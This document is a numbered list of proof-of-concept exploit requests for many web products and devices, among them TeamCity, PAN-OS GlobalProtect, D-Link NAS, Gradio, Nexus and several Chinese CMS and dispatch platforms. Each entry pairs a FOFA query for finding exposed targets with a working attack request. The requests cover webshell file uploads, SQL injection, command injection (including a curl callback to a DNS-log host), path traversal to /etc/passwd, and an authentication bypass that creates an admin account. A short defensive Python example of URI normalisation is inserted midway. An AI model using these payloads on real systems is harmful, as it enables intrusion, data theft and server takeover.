User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

The uploaded file doubles as a webshell: it evaluates the sec POST parameter.

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

Time-based: the response is delayed by about 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a new account with the SYSTEM_ADMIN role without authentication.

CVE-2024-27199 (path traversal to authenticated pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

The path is spelled commodtiy in the PoC; the uploaded script deletes itself after running.

134. 网康 (Netentsec) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

Error-based: the database version is echoed back inside the XPATH syntax error raised by updatexml().

135. 网康 (Netentsec) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based: the MD5 of 102103122 is echoed back inside the XPATH syntax error raised by extractvalue().

136. NextChat CORS proxy SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The server fetches the URL embedded in the path; confirm with the DNS lookup on the dnslog host.

137. 福建科立讯 (Fujian Kirisun) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

Time-based (SLEEP(5)); entries 138 to 140 below use the same technique against other parameters of the same platform.

138. 福建科立讯 (Fujian Kirisun) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 (Fujian Kirisun) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 (Fujian Kirisun) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 (Fujian Kirisun) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

Union-based: the MD5 of 1 wrapped in ~ appears in the response.

142. CMSV6 vehicle monitoring platform weak (default) password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id); user and passwd are the fixed credentials the PoC relies on.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The request itself only plants the file name; the embedded command runs when device telemetry is next processed, so allow for a delay before the DNS callback arrives.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

transport decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:8
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

validationRules is evaluated as script on the server: the function spawns the command through java.lang.ProcessBuilder and returns its output. This variant runs ipconfig (Windows hosts); the one below runs id.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

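The AJ-Report requests above (;swagger-ui inserted into the path) and the TeamCity entry 132 (a target ending in ;.jsp, and traversal under /res/, /.well-known/acme-challenge/ and /update/) share one root cause, stated here as an assumption rather than something the page spells out: the authentication filter decides on the raw request URI with substring or suffix checks, while the servlet container routes on a canonical path from which matrix parameters (;name=value) and dot segments have been removed. The following is an added example, not code from either product; the allow-list is hypothetical and modelled on the paths those PoCs use. For TeamCity the routed target is the value of the jsp parameter, so that value is fed through separately:

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Hypothetical allow-list modelled on the paths the PoCs above exempt from authentication.
PUBLIC_PREFIXES = ("/res/", "/.well-known/acme-challenge/", "/update/", "/swagger-ui/")
PUBLIC_SUFFIXES = (".jsp",)
PUBLIC_MARKERS = ("swagger-ui",)


def strip_matrix_params(path):
    """Drop ';name=value' matrix parameters from every segment, as servlet containers do
    before routing, so '/a;swagger-ui/b' routes to '/a/b' and 'users;.jsp' to 'users'."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def canonical_path(request_uri):
    """The path the router actually dispatches: no query string, percent-decoded,
    matrix parameters removed, dot segments resolved, exactly one leading slash."""
    path = unquote(urlsplit(request_uri).path) or "/"
    path = posixpath.normpath(strip_matrix_params(path))
    return "/" + path.lstrip("/")          # normpath keeps '//x' as-is; collapse it


def is_public_naive(request_uri):
    """Vulnerable pattern: prefix, suffix and substring checks on the raw request URI."""
    return (request_uri.startswith(PUBLIC_PREFIXES)
            or request_uri.endswith(PUBLIC_SUFFIXES)
            or any(marker in request_uri for marker in PUBLIC_MARKERS))


def is_public_hardened(request_uri):
    """Hardened form: prefix matches only, evaluated on the canonical path the router uses."""
    return canonical_path(request_uri).startswith(PUBLIC_PREFIXES)


def check(request_uri):
    """Return (routed_path, naive_allows, hardened_allows) for one request target."""
    return canonical_path(request_uri), is_public_naive(request_uri), is_public_hardened(request_uri)


if __name__ == "__main__":
    for uri in ("/pwned?jsp=/app/rest/users;.jsp", "/app/rest/users;.jsp",
                "/dataSetParam/verification;swagger-ui/", "/;swagger-ui/dataSource/pageList?pageSize=10",
                "/res/../admin/diagnostic.jsp", "/swagger-ui/index.html"):
        print(uri, "->", check(uri))
```

Every bypass path in the PoCs passes the naive check and fails the hardened one, while genuinely public resources under the allow-listed directories still pass both. Percent-decoding before normalisation also catches the %2e%2e spelling of the traversal.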
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), LoadMaster <= 7.2.54.8 (LTSF), LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. a Basic-auth user name that contains shell metacharacters
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd copied into a temporary file (component_id must be one of the ids returned in step 1)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy at the temporary path returned by step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based against a PostgreSQL backend (PG_SLEEP(5)): a vulnerable target answers about 5 seconds late.

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The stored path is echoed in the upload response; access the file there, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
